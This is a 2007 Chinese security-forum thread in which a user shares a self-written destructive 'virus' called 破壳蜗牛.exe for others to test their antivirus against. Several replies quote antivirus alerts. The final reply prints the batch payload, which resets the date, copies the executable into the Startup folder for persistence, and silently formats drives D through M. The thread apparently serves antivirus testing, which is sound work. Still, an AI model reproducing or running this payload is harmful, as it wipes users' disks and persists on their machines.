新写的病毒 大家来杀啊~！

Saturn87930

本来想在开始直接设定个值为ALLDISK的，但不知道有用没，在后面用了，也不知道有用没~！

Saturn87930

原帖由 wxb1994 于 2007-5-6 11:09 发表
救命啊,我运行了那个程序

大兄弟，回来了麻烦告诉我一下有什么状况
泄了……

jlj383940

以下SNS：蜗牛要建*.TMP，阻止后直接砍了进程，不是怕FORMAT 它动不了我，而是怕注册表太大了，实机中SNS要是万一RD防不全（现在毒恶，专找冷门），FIXREG太烦了


2007-5-6 12:38:51        !**************************************************
                        Safe'n'Sec 警报
                        行为
                        时间: 2007-5-6 12:38:19
                        类型: 编辑一个文件/目录
                        风险: 中等
                        
                        程序
                        PID: 3216
                        PPID: 2184
                        UID: JLJ\jljqq
                        文件：E:\下载\破壳蜗牛\破壳蜗牛.EXE
                        
                        对象
                        文件/目录: C:\DOCUMENTS AND SETTINGS\JLJQQ\LOCAL SETTINGS\TEMP\IXP000.TMP\TMP4351$.TMP
                        用户操作:        阻止
                        ***************************************************

[ 本帖最后由 jlj383940 于 2007-5-6 12:50 编辑 ]

Nblock

原帖由 xingyux1 于 2007-5-6 10:16 发表
微点
程序:
C:\DOCUMENTS AND SETTINGS\ADMINISTRATOR\桌面\破壳蜗牛.EXE
1) C:\DOCUMENTS AND SETTINGS\ADMINISTRATOR\LOCAL SETTINGS\TEMP\BT5106.BAT
是可疑程序!
试图执行Format操作!
是否阻止该进程 ...

    微点0day  有微点的不要运行格盘毒 小心系统挂掉

小邪邪

.

蓝色牛仔裤

用犀牛的话防住两个bat应该就行了吧..

Saturn87930

有点疑惑，我写的代码我明白什么意思，但是我不知道为什么杀软会报后门程序……
    我没加什么外来的东西~！纯编写……
    难道杀软是以偏盖全，只要有害就归类为后门？
    沉思……

Nblock

原帖由 Saturn87930 于 2007-5-6 12:59 发表
有点疑惑，我写的代码我明白什么意思，但是我不知道为什么杀软会报后门程序……
    我没加什么外来的东西~！纯编写……
    难道杀软是以偏盖全，只要有害就归类为后门？
    沉思……

。。。

Anycall-D908

发作的时候是全格还是只格系统盘?在影子下观察情况怕不怕....(唉,自从玩了魔兽世界越来越胆小)

Nblock

原帖由 Anycall-D908 于 2007-5-6 13:04 发表
发作的时候是全格还是只格系统盘?在影子下观察情况怕不怕....(唉,自从玩了魔兽世界越来越胆小)

date 1987-09-30
copy 破壳蜗牛.exe "C:\Documents and Settings\All Users\「开始」菜单\程序\启动"
@format d:/y/q
@format e:/y/q
@format f:/y/q
@format g:/y/q
@format h:/y/q
@format i:/y/q
@format j:/y/q
@format k:/y/q
@format l:/y/q
@format m:/y/q
运行下就知道了